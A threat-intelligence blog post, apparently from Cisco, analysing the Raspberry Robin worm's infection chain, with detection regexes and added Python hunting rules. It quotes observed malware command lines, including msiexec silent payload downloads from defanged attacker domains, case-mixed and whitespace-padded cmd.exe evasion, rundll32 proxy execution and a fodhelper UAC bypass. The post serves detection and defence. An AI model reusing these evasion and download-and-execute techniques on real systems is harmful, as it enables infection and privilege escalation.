Tuesday, August 16, 2022
Raspberry Robin: Highly Evasive Worm Spreads over External Disks

Introduction

During our threat hunting exercises in recent months, we have started to observe a distinguishing pattern of msiexec.exe usage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered malware called Raspberry Robin. The Red Canary research team first coined the name for this malware in their blog post, and Sekoia published a Flash Report about the activity under the name QNAP Worm. Both articles offer great analysis of the malware's behavior. Our findings support and enrich prior research on the subject.

Execution Chain

Raspberry Robin is a worm that spreads over external drives. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

Image 1: Execution chain of Raspberry Robin

Let's walk through the steps of the kill chain to see how this malware functions.

Delivery and Exploitation

Raspberry Robin is delivered through infected external disks. Once the disk is attached, cmd.exe tries to execute commands from a file on that disk. This file is either a .lnk file or a file with a specific naming pattern: a 2 to 5 character name with a usually obscure extension, including .swy, .chk, .ico, .usb, .xml, and .cfg. The attacker also pads the command line with an excessive amount of whitespace/non-printable characters and alternates letter case to evade string-matching detection techniques. Example command lines include:

  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /R C:\WINDOWS\system32\cmd.exe<Gne.Swy

A file sample for the delivery stage can be found at this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations

Next, we observe explorer.exe running with an obscure command line argument, spawned by the previous instance of cmd.exe. This argument appears to be the name of the infected external drive or of the .lnk file that was previously executed. Some of the samples had values such as USB, USB DISK, or USB Drive, while other samples had more specific names. On every instance of explorer.exe we see that the adversary alternates the letter case to evade detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK

Installation

After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -q or /q along with the standard install parameter to operate quietly. Once again, mixed-case letters are used to bypass detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you can see above, the URLs used for payload download follow a specific pattern. Domains use 2 to 4 character names with obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths consist of a single directory with a random 11-character string, followed by the hostname and the username of the victim. In network telemetry, we also observed the Windows Installer user agent, a consequence of using msiexec.exe as the downloader. To detect Raspberry Robin through its URL pattern, use this regex:

^http[s]{0,1}://[a-zA-Z0-9]{2,4}\.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|\?).*?$
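The following is an added example, not code from the Cisco post, that turns the delivery and installation observations above into hunting logic: it strips the non-printable padding and folds case, flags cmd.exe reading its input from a short oddly-named file or an .lnk stream, and applies the post's URL regex (with its escapes restored) to the msiexec install target. The sample command lines and hostnames are constructed.

```python
import re

# Constructed command lines modelled on those quoted above; the control characters
# and mixed case reproduce the worm's padding trick. Hostnames are made up.
EVENTS = [
    "C:\\Windows\\System32\\cmd.exe \t\x0b\x0c   /RCmD<qjM.chK",
    "C:\\Windows\\System32\\cmd.exe \x1e\x1f  /rcMD<USB DISK.LNk:qk",
    "C:\\Windows\\System32\\cmd.exe    /R C:\\WINDOWS\\system32\\cmd.exe<Gne.Swy",
    "C:\\Windows\\System32\\cmd.exe /c dir C:\\Users",                     # benign
    "mSIexeC -Q -IhTtP://Ab1.XyZ:8080/abcdefghijk/WS01=jdoe",
    "msIexec /Q -i http://cd2.Pw:8080/lmnopqrstuv/WS02?jdoe",
    "msiexec /i https://example.com/setup.msi /qn",                        # benign
]
PAYLOAD_EXTS = {"swy", "chk", "ico", "usb", "xml", "cfg"}
# The post's URL regex, with the escapes (\. and \?) that the page had lost restored.
URL_RE = re.compile(r"^http[s]{0,1}://[a-zA-Z0-9]{2,4}\.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|\?).*?$")
# msiexec install switch; the worm sometimes fuses it to the URL (-IhTtP://...).
MSI_RE = re.compile(r"[-/]i\s*(https?://\S+)")

def normalize(cmd: str) -> str:
    """Drop non-printables, collapse whitespace and fold case before matching."""
    printable = "".join(ch for ch in cmd if ch.isprintable())
    return " ".join(printable.split()).lower()

def cmd_redirect_rule(cmd: str) -> bool:
    """cmd.exe fed via '<' from a 2-5 char file with an odd extension, or an .lnk stream."""
    n = normalize(cmd)
    if not n.startswith("c:\\windows\\system32\\cmd.exe"):
        return False
    m = re.search(r"cmd(?:\.exe)?<(.+)$", n)
    target = m.group(1) if m else ""
    if ".lnk:" in target:
        return True
    base, _, ext = target.rpartition(".")
    return 2 <= len(base) <= 5 and ext in PAYLOAD_EXTS

def msiexec_url_rule(cmd: str):
    """Return the install URL when msiexec's target has the Raspberry Robin URL shape."""
    n = normalize(cmd)
    if not re.match(r"(?:.*\\)?msiexec(?:\.exe)?\s", n):
        return None
    m = MSI_RE.search(n)
    return m.group(1) if m and URL_RE.match(m.group(1)) else None

def scan(events):
    return {"cmd_redirect": [e for e in events if cmd_redirect_rule(e)],
            "msiexec_payload_url": [u for u in map(msiexec_url_rule, events) if u]}
```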

If we look up the WHOIS information for the observed domains, we see domain registration dates going as far back as February 2015. We also see an increase in registered domains starting from September 2021, which aligns with the initial observations of Raspberry Robin by our peers.

WHOIS Creation Date    Count
12/9/2015              1
10/8/2020              1
11/14/2020             1
7/3/2021               1
7/26/2021              2
9/11/2021              2
9/23/2021              9
9/24/2021              6
9/26/2021              4
9/27/2021              2
11/9/2021              3
11/10/2021             1
11/18/2021             2
11/21/2021             3
12/11/2021             7
12/31/2021             7
1/17/2022              6
1/30/2022              11
1/31/2022              3
4/17/2022              5

Table 1: Distribution of domain creation dates over time


The associated domains have SSL certificates with the subject alternative name q74243532.myqnapcloud.com, which points to the underlying QNAP cloud infrastructure. Their URL scan results also return login pages of QNAP's QTS service:

Image 2: QNAP QTS login page from associated domains

Once the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to launch system binaries such as msiexec.exe, odbcconf.exe, or control.exe. These binaries are used to execute the payload stored in C:\ProgramData\[3 chars]

  • C:\WINDOWS\system32\rundll32.exe shell32.dll ShellExec_RunDLL C:\WINDOWS\syswow64\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:\ProgramData\Azuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:\Windows\system32\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:\Windows\syswow64\odbcconf.exe -s -C -a {regsvr C:\ProgramData\Tvbzhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:\WINDOWS\syswow64\odbcconf -E /c /C -a {regsvr C:\ProgramData\Euoikdvnbb.xml.}
  • C:\WINDOWS\system32\rundll32.exe SHELL32,ShellExec_RunDLL C:\WINDOWS\syswow64\CONTROL.EXE C:\ProgramData\Lzmqkuiht.lkg.

This is followed by the execution of fodhelper.exe, which has the auto-elevate bit set to true. It is often leveraged by adversaries to bypass User Account Control and execute additional commands with escalated privileges [3]. To monitor for suspicious executions of fodhelper.exe, we suggest watching for instances of it started without any command line arguments.

Command and Control

Raspberry Robin sets up its C2 channel through further executions of system binaries without any command line arguments, which is quite unusual. That likely points to process injection, given the elevated privileges obtained in earlier steps of the execution chain. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.
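Below is an added example, not the Cisco post's own code, that encodes the two post-download observations above as hunting rules over constructed endpoint telemetry: rundll32.exe proxying execution through shell32's ShellExec_RunDLL to msiexec/odbcconf/control with a C:\ProgramData path, and argument-less fodhelper.exe followed on the same host by argument-less dllhost/rundll32/regsvr32. The 5-minute correlation window and the telemetry tuples are assumptions of this example.

```python
from datetime import datetime, timedelta
import re

# Constructed telemetry: (timestamp, host, image path, command line). Not real data.
EVENTS = [
    ("2022-08-16T10:00:50", "WS01", r"C:\Windows\System32\rundll32.exe",
     r"C:\WINDOWS\system32\rundll32.exe SHELL32,ShellExec_RunDLL C:\WINDOWS\syswow64\CONTROL.EXE C:\ProgramData\Lzmqkuiht.lkg."),
    ("2022-08-16T10:01:02", "WS01", r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    ("2022-08-16T10:01:09", "WS01", r"C:\Windows\System32\dllhost.exe", r'"C:\Windows\System32\dllhost.exe"'),
    ("2022-08-16T10:01:15", "WS01", r"C:\Windows\System32\regsvr32.exe", "regsvr32.exe"),
    ("2022-08-16T10:05:00", "WS02", r"C:\Windows\System32\dllhost.exe", "dllhost.exe /Processid:{CONSTRUCTED-GUID}"),
    ("2022-08-16T10:30:00", "WS03", r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    ("2022-08-16T10:45:00", "WS03", r"C:\Windows\System32\rundll32.exe", "rundll32.exe"),  # outside window
]
UAC_BYPASS = {"fodhelper.exe"}
C2_BINARIES = {"dllhost.exe", "rundll32.exe", "regsvr32.exe"}
# rundll32 -> shell32!ShellExec_RunDLL(A) -> msiexec/odbcconf/control with a ProgramData path.
SHELLEXEC_RE = re.compile(r"rundll32(?:\.exe)?\s+shell32(?:\.dll)?[ ,]shellexec_rundll[a]?\s+.*?"
                          r"(?:msiexec|odbcconf|control)(?:\.exe)?\b.*?\\programdata\\", re.IGNORECASE)

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def has_no_arguments(image, cmdline):
    """True when the command line is only the image itself (bare name or quoted full path)."""
    cl = cmdline.strip().strip('"').lower()
    return cl in (basename(image), image.lower())

def shellexec_rule(events):
    """(host, command line) for rundll32 launches that proxy through ShellExec_RunDLL."""
    return [(h, cl) for _, h, _, cl in events if SHELLEXEC_RE.search(cl)]

def uac_then_c2_rule(events, window=timedelta(minutes=5)):
    """Per host: argument-less fodhelper.exe followed within `window` by argument-less C2 binaries."""
    pivot, hits = {}, {}
    for ts, host, image, cmdline in sorted(events):
        name = basename(image)
        if not has_no_arguments(image, cmdline):
            continue
        t = datetime.fromisoformat(ts)
        if name in UAC_BYPASS:
            pivot[host] = t
        elif name in C2_BINARIES and host in pivot and t - pivot[host] <= window:
            hits.setdefault(host, []).append(name)
    return hits
```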

Detection through Global Threat Alerts

In Cisco Global Threat Alerts, available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track this activity under the Raspberry Robin threat object. Image 3 shows a detection sample of Raspberry Robin:

Image 3: Raspberry Robin detection sample in Cisco Global Threat Alerts

Conclusion

Raspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and abuse of compromised QNAP accounts. Although we have the same intelligence gaps as our peers (how it infects external disks, what its actions on target are), we are continuously observing its activities.

Indicators of Compromise


References

  1. Raspberry Robin gets the worm early – https://redcanary.com/blog/raspberry-robin/
  2. QNAP worm: who benefits from crime? – https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
